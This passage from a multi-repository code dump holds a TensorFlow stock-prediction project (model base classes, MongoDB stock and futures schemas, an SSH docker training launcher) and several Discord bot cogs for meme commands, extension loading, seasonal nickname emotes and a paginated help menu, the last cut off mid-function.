            _, loss = self.session.run([self.train_op, self.loss],
                                       feed_dict={self.rnn_x: x_rnn,
                                                  self.cnn_x: x_cnn,
                                                  self.label: batch_y})
            if (step + 1) % 1000 == 0:
                logging.warning("Step: {0} | Loss: {1:.7f}".format(step + 1, loss))
            if step > 0 and (step + 1) % self.save_step == 0:
                if self.enable_saver:
                    self.save(step)

    # At prediction time the loss function is no longer involved.
    def predict(self, x):
        return self.session.run(self.y, feed_dict={self.rnn_x: x,
                                                   self.cnn_x: x.reshape(-1, self.seq_length, self.x_space, 1)})


def main(args):
    # mode = args.mode
    mode = "train"
    # codes = args.codes
    # codes = ["601398"]
    codes = ["600036", "601328", "601998", "601398"]
    # codes = ["AU88", "RB88", "CU88", "AL88"]
    market = args.market  # default="stock"
    train_steps = args.train_steps  # default=100000
    training_data_ratio = 0.8
    # training_data_ratio = args.training_data_ratio

    # env is the stock market; instantiate Market with the optional keyword arguments.
    env = Market(codes, start_date="2008-01-01", end_date="2019-07-19", **{
        "market": market,  # default="stock"
        "use_sequence": True,
        "scaler": MinMaxScaler,  # the scaler provided by sklearn
        "mix_index_state": False,  # mix in the Shanghai Composite Index so the market trend feeds a broader prediction
        "training_data_ratio": training_data_ratio,
    })

    model_name = os.path.basename(__file__).split('.')[0]  # returns "TreNet", i.e. the file name

    # Instantiate the algorithm -- here TreNet -- passing a series of optional keyword arguments.
    algorithm = Algorithm(tf.Session(config=config), env, env.seq_length, env.data_dim, env.code_count, **{
        "mode": mode,  # test
        "hidden_size": 5,  # the LSTM hidden size
        "enable_saver": True,
        "train_steps": train_steps,  # default=100000
        "enable_summary_writer": True,
        "save_path": os.path.join(CHECKPOINTS_DIR, "SL", model_name, market, "model"),
        "summary_path": os.path.join(CHECKPOINTS_DIR, "SL", model_name, market, "summary"),
    })

    algorithm.run()
    algorithm.eval_and_plot()


if __name__ == '__main__':
    # Pass in the parsed command-line arguments.
    main(model_launcher_parser.parse_args())
```
#### File: base/algorithm/model.py
```python
import tensorflow as tf
import numpy as np
import json

from abc import abstractmethod
from helper import data_ploter
from tensorflow.contrib import rnn
from helper.data_logger import generate_algorithm_logger


# Base model: defines the most generic helpers, such as adding convolutional and recurrent layers.
class BaseTFModel(object):

    def __init__(self, session, env, **options):
        self.session = session
        self.env = env
        self.total_step = 0

        try:
            self.learning_rate = options['learning_rate']
        except KeyError:
            self.learning_rate = 0.001

        try:
            self.batch_size = options['batch_size']
        except KeyError:
            self.batch_size = 32

        try:
            self.logger = options['logger']
        except KeyError:
            self.logger = generate_algorithm_logger('model')

        try:
            self.enable_saver = options["enable_saver"]
        except KeyError:
            self.enable_saver = False

        try:
            self.enable_summary_writer = options['enable_summary_writer']
        except KeyError:
            self.enable_summary_writer = False

        try:
            # For LSTM, Algorithm passes "save_path": os.path.join(CHECKPOINTS_DIR, "SL", model_name, market, "model") at initialization.
            self.save_path = options["save_path"]
        except KeyError:
            self.save_path = None

        try:
            self.summary_path = options["summary_path"]
        except KeyError:
            self.summary_path = None

        try:
            self.mode = options['mode']
        except KeyError:
            self.mode = 'train'

    def restore(self):
        self.saver.restore(self.session, self.save_path)

    def _init_saver(self):
        if self.enable_saver:
            self.saver = tf.train.Saver()

    def _init_summary_writer(self):
        if self.enable_summary_writer:
            self.merged_summary_op = tf.summary.merge_all()
            self.summary_writer = tf.summary.FileWriter(self.summary_path, self.session.graph)

    @abstractmethod
    def _init_input(self, *args):
        pass

    @abstractmethod
    def _init_nn(self, *args):
        pass

    @abstractmethod
    def _init_op(self):
        pass

    @abstractmethod
    def train(self):
        pass

    @abstractmethod
    def predict(self, a):
        return None, None, None

    @abstractmethod
    def run(self):
        pass

    # Static method: add a recurrent neural network (built from LSTM cells here).
    @staticmethod
    def add_rnn(layer_count, hidden_size, cell=rnn.BasicLSTMCell, activation=tf.tanh):
        # hidden_size = 5; a sequence of cells.
        cells = [cell(hidden_size, activation=activation) for _ in range(layer_count)]
        return rnn.MultiRNNCell(cells)

    # Static method: add a convolutional layer plus a pooling layer; returns the pooling layer.
    @staticmethod
    def add_cnn(x_input, filters, kernel_size, pooling_size):
        # x_input: Tensor("Placeholder_1:0", shape=(?, 5, 20, 1), dtype=float32)
        convoluted_tensor = tf.layers.conv2d(x_input, filters, kernel_size,
                                             padding='SAME', activation=tf.nn.relu)
        # convoluted_tensor: Tensor("conv2d/Relu:0", shape=(?, 5, 20, 2), dtype=float32)
        tensor_after_pooling = tf.layers.max_pooling2d(convoluted_tensor, pooling_size,
                                                       strides=[1, 1], padding='SAME')
        # tensor_after_pooling: Tensor("max_pooling2d/MaxPool:0", shape=(?, 5, 20, 2), dtype=float32)
        return tensor_after_pooling

    # Static method: add a dense (fully connected) layer.
    @staticmethod
    def add_fc(x, units, activation=None):
        return tf.layers.dense(x, units, activation=activation)


# Second-level model: base RL (reinforcement learning), built on the first-level BaseTFModel class.
class BaseRLTFModel(BaseTFModel):

    # Initialize this class.
    def __init__(self, session, env, a_space, s_space, **options):
        # Initialize the parent class.
        super(BaseRLTFModel, self).__init__(session, env, **options)

        # Initialize env parameters.
        self.a_space, self.s_space = a_space, s_space

        try:
            self.episodes = options['episodes']
        except KeyError:
            self.episodes = 30

        try:
            self.gamma = options['gamma']
        except KeyError:
            self.gamma = 0.9

        try:
            self.tau = options['tau']
        except KeyError:
            self.tau = 0.01

        try:
            self.epsilon = options['epsilon']
        except KeyError:
            self.epsilon = 0.9

        try:
            self.buffer_size = options['buffer_size']
        except KeyError:
            self.buffer_size = 10000

        try:
            self.save_episode = options["save_episode"]
        except KeyError:
            self.save_episode = 10

    # Evaluation.
    def eval(self):
        self.mode = 'test'
        s = self.env.reset('eval')
        while True:
            # Forward pass; s is the input data.
            c, a, _ = self.predict(s)
            # Step the environment forward.
            s_next, r, status, info = self.env.forward(c, a)
            s = s_next
            if status == self.env.Done:
                self.env.trader.log_asset(0)
                break

    def plot(self):
        with open(self.save_path + '_history_profits.json', mode='w') as fp:
            json.dump(self.env.trader.history_profits, fp, indent=True)

        with open(self.save_path + '_baseline_profits.json', mode='w') as fp:
            json.dump(self.env.trader.history_baselines, fp, indent=True)

        data_ploter.plot_profits_series(
            self.env.trader.history_baselines,
            self.env.trader.history_profits,
            self.save_path
        )

    # Save the model parameters to a checkpoint.
    def save(self, episode):
        self.saver.save(self.session, self.save_path)
        self.logger.warning("Episode: {} | Saver reach checkpoint.".format(episode))

    # Save a transition.
    @abstractmethod
    def save_transition(self, s, a, r, s_next):
        pass

    # Abstract method: log the loss.
    @abstractmethod
    def log_loss(self, episode):
        pass

    # Map actions to indices: where a > 1/3 take 2, where a < -1/3 take 1, otherwise 0;
    # the result is cast to int32 and converted to a list.
    @staticmethod
    def get_a_indices(a):
        a = np.where(a > 1 / 3, 2, np.where(a < - 1 / 3, 1, 0)).astype(np.int32)[0].tolist()
        return a

    def get_stock_code_and_action(self, a, use_greedy=False, use_prob=False):
        # Reshape a.
        if not use_greedy:
            a = a.reshape((-1,))
            # Calculate action index depending on prob.
            if use_prob:
                # Generate indices.
                a_indices = np.arange(a.shape[0])
                # Get action index.
                action_index = np.random.choice(a_indices, p=a)
            else:
                # Get action index.
                action_index = np.argmax(a)
        else:
            if use_prob:
                # Calculate action index.
                if np.random.uniform() < self.epsilon:
                    action_index = np.floor(a).astype(int)
                else:
                    action_index = np.random.randint(0, self.a_space)
            else:
                # Calculate action index.
                action_index = np.floor(a).astype(int)

        # Get action.
        action = action_index % 3
        # Get stock index.
        stock_index = np.floor(action_index / 3).astype(np.int)
        # Get stock code.
        stock_code = self.env.codes[stock_index]

        return stock_code, action, action_index


# Also second level: the supervised-learning base, built on BaseTFModel with a few
# class-specific attributes and methods added.
class BaseSLTFModel(BaseTFModel):

    def __init__(self, session, env, **options):
        super(BaseSLTFModel, self).__init__(session, env, **options)

        # Initialize parameters.
        self.x, self.label, self.y, self.loss = None, None, None, None

        try:
            self.train_steps = options["train_steps"]
        except KeyError:
            self.train_steps = 30000

        try:
            self.save_step = options["save_step"]
        except KeyError:
            self.save_step = 1000

    # In 'train' mode, train; otherwise restore the already-trained parameters.
    def run(self):
        if self.mode == 'train':
            self.train()
        else:
            self.restore()

    def save(self, step):
        self.saver.save(self.session, self.save_path)
        self.logger.warning("Step: {} | Saver reach checkpoint.".format(step + 1))

    def eval_and_plot(self):
        # x has shape (561, 5, 25) and label has shape (561, 5): the full test set of
        # input sequences and, for each sequence, the next day's close as the output.
        x, label = self.env.get_test_data()
        y = self.predict(x)  # shape (561, 5); 0.2 * total data = 561
        with open(self.save_path + '_y.json', mode='w') as fp:
            # Saved as model_y.json; checkpoints\SL\stock\model_y.json holds the predictions y.
            json.dump(y.tolist(), fp, indent=True)
        with open(self.save_path + '_label.json', mode='w') as fp:
            # Saved as model_label.json; checkpoints\SL\stock\model_label.json holds the true test-set labels.
            json.dump(label.tolist(), fp, indent=True)
        data_ploter.plot_stock_series(self.env.codes,  # env.codes == ['600036', '601328', '601998', '601398']
                                      y,  # shape (561, 5)
                                      label,  # shape (561, 5)
                                      self.save_path)  # saves the same picture that running plot_prices.py alone produces


class BasePTModel(object):

    def __init__(self, env, **options):
        self.env = env

        try:
            self.learning_rate = options['learning_rate']
        except KeyError:
            self.learning_rate = 0.001

        try:
            self.batch_size = options['batch_size']
        except KeyError:
            self.batch_size = 32

        try:
            self.save_path = options["save_path"]
        except KeyError:
            self.save_path = None

        try:
            self.mode = options['mode']
        except KeyError:
            self.mode = 'train'

    @abstractmethod
    def train(self):
        pass

    @abstractmethod
    def predict(self, a):
        pass

    @abstractmethod
    def restore(self):
        pass

    @abstractmethod
    def run(self):
        pass


class BaseRLPTModel(BasePTModel):

    def __init__(self, env, a_space, s_space, **options):
        super(BaseRLPTModel, self).__init__(env, **options)

        self.env = env

        self.a_space, self.s_space = a_space, s_space

        try:
            self.episodes = options['episodes']
        except KeyError:
            self.episodes = 30

        try:
            self.gamma = options['gamma']
        except KeyError:
            self.gamma = 0.9

        try:
            self.tau = options['tau']
        except KeyError:
            self.tau = 0.01

        try:
            self.buffer_size = options['buffer_size']
        except KeyError:
            self.buffer_size = 2000

        try:
            self.mode = options['mode']
        except KeyError:
            self.mode = 'train'

    @abstractmethod
    def _init_input(self, *args):
        pass

    @abstractmethod
    def _init_nn(self, *args):
        pass

    @abstractmethod
    def _init_op(self):
        pass

    @abstractmethod
    def save_transition(self, s, a, r, s_n):
        pass

    @abstractmethod
    def log_loss(self, episode):
        pass

    @staticmethod
    def get_a_indices(a):
        a = np.where(a > 1 / 3, 2, np.where(a < - 1 / 3, 1, 0)).astype(np.int32)[0].tolist()
        return a
```
#### File: base/model/document.py
```python
from mongoengine import Document
from mongoengine import StringField, FloatField, DateTimeField


class Stock(Document):  # the class name is also the collection name
    # Stock code.
    code = StringField(required=True)  # field (column) name
    # Trading day.
    date = DateTimeField(required=True)
    # Opening price.
    open = FloatField()
    # Highest price.
    high = FloatField()
    # Lowest price.
    low = FloatField()
    # Closing price.
    close = FloatField()
    # Trading volume.
    volume = FloatField()
    # Trading amount.
    amount = FloatField()
    # Percent change.
    p_change = FloatField()
    # Price change.
    price_change = FloatField()
    # 5-day mean price.
    ma5 = FloatField()
    # 10-day mean price.
    ma10 = FloatField()
    # 20-day mean price.
    ma20 = FloatField()
    # 5-day mean volume.
    v_ma5 = FloatField()
    # 10-day mean volume.
    v_ma10 = FloatField()
    # 20-day mean volume.
    v_ma20 = FloatField()
    # Turnover rate.
    turnover = FloatField()

    meta = {
        # Indexes speed up queries; 'indexes' is mongoengine's reserved metadata key.
        # Indexes are built here on code and date.
        'indexes': [
            'code',
            'date',
            ('code', 'date')
        ]
    }

    def save_if_need(self):
        # Keeps the stored data ready to be updated to the latest state.
        return self.save() if len(self.__class__.objects(code=self.code, date=self.date)) < 1 else None

    def to_state(self):
        stock_dic = self.to_mongo()  # convert the query result to a dict
        stock_dic.pop('_id')
        stock_dic.pop('code')  # pop() is the dict method that removes the value for a key
        stock_dic.pop('date')
        return stock_dic.values()  # return the values of the remaining keys

    def to_dic(self):
        stock_dic = self.to_mongo()  # convert the query result to a dict
        stock_dic.pop('_id')  # drop the _id column
        return stock_dic.values()  # return the values of the remaining keys

    @classmethod
    def get_k_data(cls, code, start, end):
        # date__gte=start and date__lte=end are the pymongo-style query operators:
        # the date column must be >= start and <= end; order_by('date') sorts ascending.
        return cls.objects(code=code, date__gte=start, date__lte=end).order_by('date')

    @classmethod
    def exist_in_db(cls, code):
        return True if cls.objects(code=code)[:1].count() else False


class Future(Document):
    # Contract code.
    code = StringField(required=True)
    # Trading day.
    date = DateTimeField(required=True)
    # Opening price.
    open = FloatField()
    # Highest price.
    high = FloatField()
    # Lowest price.
    low = FloatField()
    # Closing price.
    close = FloatField()
    # Trading volume.
    volume = FloatField()

    meta = {
        'indexes': [
            'code',
            'date',
            ('code', 'date')
        ]
    }

    def save_if_need(self):
        return self.save() if len(self.__class__.objects(code=self.code, date=self.date)) < 1 else None

    def to_state(self):
        stock_dic = self.to_mongo()
        stock_dic.pop('_id')
        stock_dic.pop('code')
        stock_dic.pop('date')
        return stock_dic.values()

    def to_dic(self):
        stock_dic = self.to_mongo()
        stock_dic.pop('_id')
        return stock_dic.values()

    @classmethod
    def get_k_data(cls, code, start, end):
        return cls.objects(code=code, date__gte=start, date__lte=end).order_by('date')

    @classmethod
    def exist_in_db(cls, code):
        return True if cls.objects(code=code)[:1].count() else False
```
#### File: Personae-master-01/script/model_launcher.py
```python
import paramiko
import sys

from helper.args_parser import stock_codes, future_codes


def launch_model():
    # Model Name.
    model_name = 'PolicyGradient'
    # Market Type.
    market = 'stock'
    # Codes.
    codes = stock_codes
    # Start date.
    start = "2008-01-01"
    # End date.
    end = "2019-07-19"
    # Episodes.
    episode = 500
    # Train steps.
    train_steps = 100000
    # Training data ratio.
    training_data_ratio = 0.8
    # Mounted dir.
    mounted_dir = '/home/duser/shuyu/Personae:/app/Personae/'

    image_name = 'ceruleanwang/personae'

    rl_cmd = 'docker run -tv {} --network=quant {} algorithm/RL/'.format(mounted_dir, image_name)
    rl_cmd += "{}.py -c {} -s {} -e {} --market {} --episode {} --train_steps {} --training_data_ratio {}".format(
        model_name, " ".join(codes), start, end, market, episode, train_steps, training_data_ratio
    )

    cmd = rl_cmd

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(hostname='192.168.4.199', port=22, username='duser')

    trans = ssh.get_transport()

    channel = trans.open_session()
    channel.get_pty()
    channel.invoke_shell()

    std_in, std_out, std_err = ssh.exec_command(cmd)

    while True:
        line = std_out.readline()
        if line:
            sys.stdout.write(line)
        else:
            break

    ssh.close()


if __name__ == '__main__':
    launch_model()
```
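A note on the DDPG graph built in `_init_op` above: the paired `tf.assign` ops implement the standard soft target update, target ← (1 − τ)·target + τ·predict. A plain-NumPy sketch of that rule follows; the parameter values are invented for illustration and are not taken from the repository:
```python
# Standalone NumPy illustration of the DDPG soft target update; values are made up.
import numpy as np

tau = 0.01  # matches the BaseRLTFModel default above
predict_w = np.array([0.50, -0.20])  # online ("predict") network weights
target_w = np.array([0.10, 0.30])    # target network weights

# Applied once per train() call, the target slowly tracks the online network.
target_w = (1 - tau) * target_w + tau * predict_w
print(target_w)  # [0.104 0.295]
```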
{ "source": "916253/Kurisu-Reswitched", "score": 3 }
#### File: Kurisu-Reswitched/addons/meme.py ```python import discord import random from discord.ext import commands class Meme: """ Meme commands. """ def __init__(self, bot): self.bot = bot print('Addon "{}" loaded'.format(self.__class__.__name__)) @commands.command(pass_context=True, hidden=True, name="bam") async def bam_member(self, ctx, user: discord.Member, *, reason=""): """Bams a user owo""" await self.bot.say("{} is ̶n͢ow b̕&̡.̷ 👍̡".format(self.bot.escape_name(user))) @commands.command(pass_context=True, hidden=True, name="warm") async def warm_member(self, ctx, user: discord.Member, *, reason=""): """Warms a user :3""" await self.bot.say("{} warmed. User is now {}°C.".format(user.mention, str(random.randint(0, 100)))) @commands.command(hidden=True) async def frolics(self): """test""" await self.bot.say("https://www.youtube.com/watch?v=VmarNEsjpDI") def setup(bot): bot.add_cog(Meme(bot)) ```
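For context, a cog module like this only takes effect once its `setup` hook runs. A minimal sketch of the loader side under the legacy discord.py API this file targets; the `addons.meme` path, prefix, and token are assumptions, since the bot entry point is not part of this entry:
```python
# Hypothetical loader sketch -- the real entry point is not shown in this dump.
from discord.ext import commands

bot = commands.Bot(command_prefix='.')
bot.load_extension('addons.meme')  # invokes setup(bot), which registers the Meme cog
bot.run('TOKEN')  # placeholder token, supplied by the real bot config
```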
{ "source": "916253/numberbot", "score": 2 }
#### File: numberbot/cogs/load.py
```python
from __future__ import annotations

import discord

from discord.ext import commands
from typing import TYPE_CHECKING
from utils.checks import is_staff

if TYPE_CHECKING:
    from kurisu import Kurisu


class Load(commands.Cog):
    """
    Load commands.
    """

    def __init__(self, bot: Kurisu):
        self.bot: Kurisu = bot
        self.emoji = discord.PartialEmoji.from_str('⌨')

    async def cog_check(self, ctx: commands.Context):
        if ctx.guild is None:
            raise commands.NoPrivateMessage()
        return True

    @is_staff("OP")
    @commands.command(hidden=True)
    async def load(self, ctx: commands.Context, *, module: str):
        """Loads a Cog."""
        try:
            # "cogs." is five characters, so test the prefix with startswith()
            # rather than the off-by-two slice module[0:7].
            if not module.startswith("cogs."):
                module = "cogs." + module
            self.bot.load_extension(module)
            await ctx.send('✅ Extension loaded.')
        except Exception as e:
            await ctx.send(f'💢 Failed!\n```\n{type(e).__name__}: {e}\n```')

    @is_staff("OP")
    @commands.command(hidden=True)
    async def unload(self, ctx: commands.Context, *, module: str):
        """Unloads a Cog."""
        try:
            if not module.startswith("cogs."):
                module = "cogs." + module
            if module == "cogs.load":
                await ctx.send("❌ I don't think you want to unload that!")
            else:
                self.bot.unload_extension(module)
                await ctx.send('✅ Extension unloaded.')
        except Exception as e:
            await ctx.send(f'💢 Failed!\n```\n{type(e).__name__}: {e}\n```')

    @is_staff("OP")
    @commands.command(name='reload')
    async def _reload(self, ctx: commands.Context, *, module: str):
        """Reloads a Cog."""
        try:
            if not module.startswith("cogs."):
                module = "cogs." + module
            self.bot.reload_extension(module)
            await ctx.send('✅ Extension reloaded.')
        except Exception as e:
            await ctx.send(f'💢 Failed!\n```\n{type(e).__name__}: {e}\n```')


def setup(bot):
    bot.add_cog(Load(bot))
```
#### File: numberbot/cogs/seasonal.py
```python
from __future__ import annotations

import discord

from datetime import datetime
from discord.ext import commands
from re import compile, finditer, search
from typing import List, Union, Optional, TYPE_CHECKING

if TYPE_CHECKING:
    from kurisu import Kurisu


class Season:
    def __init__(self, start: str, end: str, emote: str, emote_str: str):
        self.start_str = start
        self.end_str = end
        self.start = Season.get_int_from_dotstr(start)
        self.end = Season.get_int_from_dotstr(end)
        self.emote = emote
        self.emote_str = emote_str
        self.emote_regex = compile(emote)

    def __contains__(self, time: Union[str, int]) -> bool:
        if isinstance(time, str):
            time = Season.get_int_from_dotstr(time)

        # handle wrapping around year boundaries
        if self.start > self.end:
            return time <= self.end or time >= self.start
        else:
            return self.start <= time <= self.end

    def __eq__(self, other: str) -> bool:
        return other in (self.emote_str, self.emote)

    @staticmethod
    def get_int_from_dotstr(dotstr: str) -> int:
        month, day = dotstr.split(".")
        return (int(month) * 31) + int(day)


class Seasonal(commands.Cog):
    """
    Seasonal commands.
""" seasons: List[Season] = [ Season("12.1", "12.31", "🎄", "xmasthing"), Season("6.1", "6.31", "🌈", "rainbow"), Season("10.1", "10.31", "🎃", "pumpkin"), Season("11.1", "11.30", "🦃", "turkey"), Season("12.31", "1.1", "🎆", "fireworks"), Season("3.16", "3.17", "🍀", "shamrock"), ] def __init__(self, bot: Kurisu): self.bot: Kurisu = bot self.emoji = discord.PartialEmoji.from_str('\u2600\ufe0f') async def _seasonal_impl(self, ctx: commands.Context, mode: str, target: Optional[str] = None): t = datetime.today() curr_time = f"{t.month}.{t.day}" for season_ in self.seasons: if (mode == "remove" and season_.emote_str == target) or (target is None and curr_time in season_): season = season_ break else: if target is None or mode == "add": return await ctx.send( "There is no special season happening right now " "or it hasn't been implemented yet." ) return await ctx.send( "There is no season with the name you specified." ) new_nick = "" if mode == "add": if target is not None: return await ctx.send( "💢 You can't choose which season to add! " "(Try again with just .seasonal)" ) new_nick = f"{ctx.author.display_name} {season.emote}" if ctx.author.display_name[-1] == season.emote: return await ctx.send( f"Your shown name already ends in a {season.emote}!" ) if len(new_nick) > 32: return await ctx.send( "💢 Your name is too long! " f"(max is 32 characters, yours would be {len(new_nick)})") elif mode == "remove": if ctx.author.nick: matches = list(finditer(season.emote_regex, ctx.author.nick)) if not matches: return await ctx.send( "Your nickname doesn't contain the current/requested" f" seasonal emote [{season.emote} | '{season.emote_str}']" ) res = matches[-1] new_nick = ( f"{ctx.author.display_name[:res.start()]}" f"{ctx.author.display_name[res.end():]}" ) if len(new_nick) == 0: return await ctx.send("💢 I can't completely remove your nick!") elif bool(search(season.emote_regex, ctx.author.name)): return await ctx.send(f"Your username is the one with a {season.emote_str}") else: return await ctx.send(f"You don't have a {season.emote_str}") try: await ctx.author.edit(nick=new_nick) await ctx.send(f"Your nickname is now `{ctx.author.display_name}`") except discord.errors.Forbidden: await ctx.send("💢 I can't change your nickname! (Permission Error)") @commands.guild_only() @commands.command() async def seasonal(self, ctx: commands.Context): """Adds the emote of the current season to your name. You can see which seasons exist and when they are by typing .seasonals """ return await self._seasonal_impl(ctx, "add") @commands.guild_only() @commands.command() async def noseasonal(self, ctx: commands.Context, *, target: Optional[str]): """Removes the emote of the current season (or any you want) from your name. 
You can see which seasons exist and when they are by typing .seasonals """ return await self._seasonal_impl(ctx, "remove", target) @commands.command(aliases=["seasons"]) async def seasonals(self, ctx: commands.Context): """Lists all available seasons.""" line_template = "{0:6} | {1:6} | {2:1} | {3}\n" await ctx.send( "The following seasons exist on this server:\n```" + line_template.format("start", "end", "emote", "emote_name") + f"{'=' * 36}\n" + "".join( line_template.format( season.start_str, season.end_str, season.emote, season.emote_str ) for season in self.seasons ) + "```" ) def setup(bot): bot.add_cog(Seasonal(bot)) ``` #### File: numberbot/utils/help.py ```python import discord import math from discord.ui import Select from discord.ext import commands from itertools import islice from typing import Union SELECT_MAX_VALUES = 25 class BasePaginator: """Serves as base paginator for the HelpView""" def __init__(self, n_pages): self.n_pages = n_pages self.idx = 0 self.pages: dict[int, discord.Embed] = {} def previous(self): self.idx = max(self.idx - 1, 0) def next(self): self.idx = min(self.idx + 1, self.n_pages - 1) def first(self): self.idx = 0 def last(self): self.idx = self.n_pages - 1 def is_first(self): return self.idx == 0 def is_last(self): return self.idx == self.n_pages - 1 class CogHelpPaginator(BasePaginator): commands_per_page = 8 def __init__(self, cog: Union[commands.Cog, commands.Group], commands: list[commands.Command], prefix: str): super().__init__(n_pages=math.ceil(len(commands) / self.commands_per_page)) self.cog = cog self.commands = commands self.prefix = prefix def current(self) -> discord.Embed: if embed := self.pages.get(self.idx): return embed else: index = self.idx * self.commands_per_page embed = self.create_embed(commands=self.commands[index:index + self.commands_per_page]) self.pages[self.idx] = embed return embed def create_embed(self, commands: list[commands.Command]) -> discord.Embed: embed = discord.Embed(title=f"{self.cog.qualified_name} commands", description=self.cog.description, colour=discord.Colour(0xb01ec3)) if self.n_pages > 1: embed.title += f" [{self.idx + 1}/{self.n_pages}]" for command in commands: # All commands should have a help doc but just in case someone adds one without it. 
embed.add_field(name=f"{command.qualified_name} {command.signature}", value=command.short_doc or "No help for you.", inline=False) embed.set_footer(text=f'Use {self.prefix}help [command] for more info about a command.') return embed class MainHelpPaginator(BasePaginator): categories_per_page = 9 def __init__(self, mapping: dict[commands.Cog, list[commands.Command]], description: str, prefix: str): super().__init__(n_pages=math.ceil(len(mapping) / self.categories_per_page)) self.description = description self.prefix = prefix self.slices = [] it = iter(mapping) # Slice the mapping to mapping 6 cogs each for i in range(0, len(mapping), self.categories_per_page): self.slices.append({k: mapping[k] for k in islice(it, self.categories_per_page)}) def current(self) -> discord.Embed: if embed := self.pages.get(self.idx): return embed else: embed = self.create_embed(mapping=self.slices[self.idx]) self.pages[self.idx] = embed return embed def create_embed(self, mapping: dict[commands.Cog, list[commands.Command]]): embed = discord.Embed(title="Kurisu the bot for Nintendo Homebrew", colour=0xb01ec3) embed.description = f"{self.description}\n\nBelow you will find the categories of commands in Kurisu:" embed.set_footer( text=f"Use {self.prefix}help [category] for more info about a category or select a category below.") if self.n_pages > 1: embed.title += f" [{self.idx + 1}/{self.n_pages}]" for category, cmds in mapping.items(): if not cmds: continue embed.add_field(name=f"**{category.qualified_name}** [{len(cmds)}]", value=category.description) return embed class CommandHelpPaginator(BasePaginator): def __init__(self, command: commands.Command, prefix: str): # Commands have just one page, a paginator is not needed but makes it way easier to integrate with the View super().__init__(n_pages=1) self.description = command.help or "No help for you." 
self.prefix = prefix self.command = command def current(self) -> discord.Embed: return self.create_embed(command=self.command) def create_embed(self, command: commands.Command): embed = discord.Embed(title=f"{command.name} command", colour=0xb01ec3) embed.description = self.description if command.aliases: embed.add_field(name="Aliases", value=' '.join(command.aliases), inline=False) embed.add_field(name="Usage", value=f"{self.prefix} {command.qualified_name} {command.signature}", inline=False) embed.set_footer(text=f"Category: {command.cog_name if command.cog_name else 'No Category'}") return embed class CategorySelect(Select['HelpView']): def __init__(self, mapping: dict[commands.Cog, list[commands.Command]], ctx: commands.Context): super().__init__(placeholder="Select a Category.") self.ctx = ctx self.mapping = mapping self.populate() def populate(self): self.add_option( label="Kurisu Categories", value="main", description="The index of Kurisu Categories.", emoji=self.ctx.bot.emoji ) for cog, cmds in self.mapping.items(): # We don't need commandless cogs here if not cmds: continue emoji = getattr(cog, 'emoji', None) self.add_option(label=cog.qualified_name, value=cog.qualified_name, description=cog.description, emoji=emoji) async def callback(self, interaction: discord.MessageInteraction): await interaction.response.defer() value = self.values[0] if value == 'main': await self.view.change_paginator( MainHelpPaginator(self.mapping, self.ctx.bot.description, self.ctx.clean_prefix), interaction) else: cog = self.ctx.bot.get_cog(value) commands = self.mapping[cog] await self.view.change_paginator(CogHelpPaginator(cog, commands, self.ctx.clean_prefix), interaction) class CommandSelect(Select['HelpView']): def __init__(self, cog: Union[commands.Cog, commands.Group], commands: list[commands.Command], ctx: commands.Context, suffix: str = ""): super().__init__(placeholder="Select a command" + suffix) self.ctx = ctx self.cog = cog self.commands = commands self.populate() def populate(self): self.add_option( label=f"{self.cog.qualified_name} commands", value="main", description=f"{self.cog.qualified_name} commands.", emoji=self.ctx.bot.emoji ) for command in self.commands: self.add_option(label=command.name, value=command.qualified_name, description=command.description) async def callback(self, interaction: discord.MessageInteraction): await interaction.response.defer() value = self.values[0] if value == 'main': await self.view.change_paginator(CogHelpPaginator(self.cog, self.commands, self.ctx.clean_prefix), interaction) else: command = self.ctx.bot.get_command(value) await self.view.change_paginator(CommandHelpPaginator(command, self.ctx.clean_prefix), interaction) class HelpView(discord.ui.View): def __init__(self, paginator: Union[MainHelpPaginator, CogHelpPaginator, CommandHelpPaginator], author: Union[discord.Member, discord.User]): super().__init__(timeout=30) self.paginator = paginator self.message = None self.author = author if self.paginator.n_pages == 1: self.disable_buttons() async def on_timeout(self) -> None: if self.message: await self.message.edit(view=None) self.stop() async def interaction_check(self, interaction: discord.MessageInteraction) -> bool: if interaction.user.id != self.author.id: await interaction.response.send_message("This view is not for you.", ephemeral=True) return False return True def reset_buttons(self): self.first_page.disabled = True self.prev_page.disabled = True self.next_page.disabled = False self.last_page.disabled = False def disable_buttons(self): 
self.first_page.disabled = True self.prev_page.disabled = True self.next_page.disabled = True self.last_page.disabled = True async def change_paginator(self, paginator: Union[MainHelpPaginator, CogHelpPaginator, CommandHelpPaginator], interaction: discord.MessageInteraction): self.paginator = paginator if self.paginator.n_pages > 1: self.reset_buttons() else: self.disable_buttons() await interaction.message.edit(embed=self.paginator.current(), view=self) @discord.ui.button(label="<<", style=discord.ButtonStyle.secondary, disabled=True) async def first_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.first_page.disabled = True self.prev_page.disabled = True self.next_page.disabled = False self.last_page.disabled = False self.paginator.first() await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label='Back', style=discord.ButtonStyle.primary, disabled=True) async def prev_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.next_page.disabled = False self.last_page.disabled = False self.paginator.previous() if self.paginator.is_first(): self.first_page.disabled = True self.prev_page.disabled = True await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label='Next', style=discord.ButtonStyle.primary) async def next_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.first_page.disabled = False self.prev_page.disabled = False self.paginator.next() if self.paginator.is_last(): self.next_page.disabled = True self.last_page.disabled = True await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label=">>", style=discord.ButtonStyle.secondary) async def last_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.first_page.disabled = False self.prev_page.disabled = False self.next_page.disabled = True self.last_page.disabled = True self.paginator.last() await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label="Exit", style=discord.ButtonStyle.red) async def remove(self, button: discord.ui.Button, interaction: discord.MessageInteraction): await interaction.response.edit_message(view=None) self.stop() class KuriHelp(commands.HelpCommand): def __init__(self): super().__init__(show_hidden=True) async def prepare_help_command(self, ctx, command=None): await ctx.bot.wait_until_all_ready() async def send_bot_help(self, mapping: dict[commands.Cog, list[commands.Command]]): f_mapping = {} # Create a mapping with the commands filtered for cog, cmds in mapping.items(): if cog and (f_cmds := await self.filter_commands(cmds, sort=True)): f_mapping[cog] = f_cmds bot = self.context.bot view = HelpView(MainHelpPaginator(f_mapping, bot.description, self.context.prefix), self.context.author) 